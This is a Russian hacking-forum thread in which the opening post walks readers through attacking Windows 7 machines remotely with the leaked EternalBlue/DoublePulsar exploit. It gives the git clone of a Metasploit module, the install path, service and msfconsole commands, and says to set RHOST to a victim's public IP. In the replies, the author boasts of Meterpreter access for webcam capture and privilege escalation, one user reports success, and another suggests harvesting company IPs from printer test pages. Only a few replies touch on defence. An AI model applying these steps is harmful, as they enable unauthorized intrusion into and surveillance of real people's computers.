Как взломать WINDOWS 7 без участия жертвы [Exploit NSA Eternalblue & Doublepulsar]

HTP.WHOAMI

Участник
Статус
offline
Регистрация
26.06.2017
Сообщения
9
Репутация
20
Представляю вам эксплоит слитый с ресурсов АНБ, может кто-то из вас очень меньшая часть начиталась на викиликс про масштабный слив: кучу разных утилит, уязвимостей и т.д. Eternalblue & Doublepulsar Exploit одна из них, данный экслоит нацелен на remote эксплоутацию, то естьабсолютно без всякого участия жертвы. Под взлом подойдут только тачки windows 7 обеих системных архитектур.

Выбираем нужную вам папку и клонируем образ с гитхаб:

Код:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

Файл eternalblue_doublepulsar.rb копируем сюда /usr/share/metasploit-framework/modules/exploits/windows/smb

Скрины:

Ваш метасплоит должен быть обновлён до последних баз.

17164633.png


В новом окне терминала сначала запустим сервисы метасплоита и базу данных postgresql:
Код:
service postgresql start
Код:
service metasploit start

Запускаем metasploit:

Код:
msfconsole

17164647.png

17164652.png


В LHOST пишем свой локальный IP адрес, узнать можно командой:
Код:
ifconfig
В RHOST пишем публичный IP жертвы

17164720.png


Видео по теме:

А также видео с русской озвучкой:
 
Последнее редактирование:

Inconsumable

Участник
Статус
offline
Регистрация
28.11.2016
Сообщения
120
Репутация
21
Представляю вам эксплоит слитый с ресурсов АНБ, может кто-то из вас очень меньшая часть начиталась на викиликс про масштабный слив: кучу разных утилит, уязвимостей и т.д. Eternalblue & Doublepulsar Exploit одна из них, данный экслоит нацелен на remote эксплоутацию, то естьабсолютно без всякого участия жертвы. Под взлом подойдут только тачки windows 7 обеих системных архитектур.

Выбираем нужную вам папку и клонируем образ с гитхаб:

Код:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

Файл eternalblue_doublepulsar.rb копируем сюда /usr/share/metasploit-framework/modules/exploits/windows/smb

Скрины:

Ваш метасплоит должен быть обновлён до последних баз.

17164633.png


В новом окне терминала сначала запустим сервисы метасплоита и базу данных postgresql:
Код:
service postgresql start
Код:
service metasploit start

Запускаем metasploit:

Код:
msfconsole

17164647.png

17164652.png


В LHOST пишем свой локальный IP адрес, узнать можно командой:
Код:
ifconfig
В RHOST пишем публичный IP жертвы

17164720.png


Видео по теме:

А также видео с русской озвучкой:
Тоесть зная ip жертвы можно его комп взломать?
 

GHOSTGR

Новичок
Статус
offline
Регистрация
26.07.2016
Сообщения
34
Репутация
8
Ну и далее что делать? проник ты, узнал пароль от юзера и нихуя?
 

HTP.WHOAMI

Участник
Статус
offline
Регистрация
26.06.2017
Сообщения
9
Репутация
20
Тоесть зная ip жертвы можно его комп взломать?
Да, по публичному IP из глобальной сети.

Ну и далее что делать? проник ты, узнал пароль от юзера и нихуя?
Какой нахуй пароль от юзера, ты перекурил? Показано, как получить шелл , то есть полный доступ к администрированию (управлению) ПК. После получения щелла метерпретер, открываются огромные возможности, можно получить VNC сессию, это типо как RDP дедик, можно делать захват вебкамеры, можно сделать эскалацию привеллегий, да хоть что блять можно сделать. Короче это полный доступ к ПК, равносильно того, что ПК жертвы это твой ПК.
 
Последнее редактирование:

Mir.mr

Новичок
Статус
offline
Регистрация
08.06.2017
Сообщения
26
Репутация
2
Просит ключ аутентификации при установки
 

HTP.WHOAMI

Участник
Статус
offline
Регистрация
26.06.2017
Сообщения
9
Репутация
20
Просит ключ аутентификации при установки
Опиши подробнее проблему начиная с того на каком дистрибутиве тестишь, системная архитектура процессора и тд
Пакетный менеджер все пакеты успешно обновил или какие-то не проапгрейдились? Если да, то какие?
 

Mir.mr

Новичок
Статус
offline
Регистрация
08.06.2017
Сообщения
26
Репутация
2
Да все норм получилось , интересно а че люди ещё пользуются brute если тема рабочая ))))
 

Missing

Заблокированные
Статус
offline
Регистрация
06.07.2017
Сообщения
44
Репутация
2
Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.
Обязательно для этого иметь линукс ? Или можно сделать это как-то с винды ? Если можно, то как ?
 

GrondAue

Новичок
Статус
offline
Регистрация
04.12.2016
Сообщения
15
Репутация
5
Н*хуя себе че привалило, давай полный разбор по этой теме. И да, как из под винды замутить?
 

raion25_78

Новичок
Статус
offline
Регистрация
06.07.2016
Сообщения
23
Репутация
3
Я с виртуалки(kali), попробовал атаковать на сам комп(win7 x64), итог синий экран). А так норм все робит
 

enjoy1112

Заблокированные
Статус
offline
Регистрация
09.06.2017
Сообщения
16
Репутация
2
Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.
Как защититься от этой хуйни,жертва же может быть любая)
 

enjoy1112

Заблокированные
Статус
offline
Регистрация
09.06.2017
Сообщения
16
Репутация
2
Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.
Или как понять шо с твоим пк происходит дерьмо?
 

Mir.mr

Новичок
Статус
offline
Регистрация
08.06.2017
Сообщения
26
Репутация
2
Попробуй порты закрыть , есть шанс что не просканят , обнови windows и.т.п
 

pradovod15

Новичок
Статус
offline
Регистрация
28.07.2017
Сообщения
2
Репутация
0
Народ!!! Тема ещ живая??? кто нить пробовал еще???
 

MCasl

Новичок
Статус
offline
Регистрация
02.08.2017
Сообщения
1
Репутация
0
Забавно, нужно будет попробовать. Сейчас все молодые фирмы на семёрках работают, а если вы работаете в обслуге или чем то подобном, то можно просто находить айпишники с помощью тест листов с принтеров, которые можно получать просто подойдя к нему и нажав пару кнопок.
Как только опробую напишу сюда (если будет о чем писать).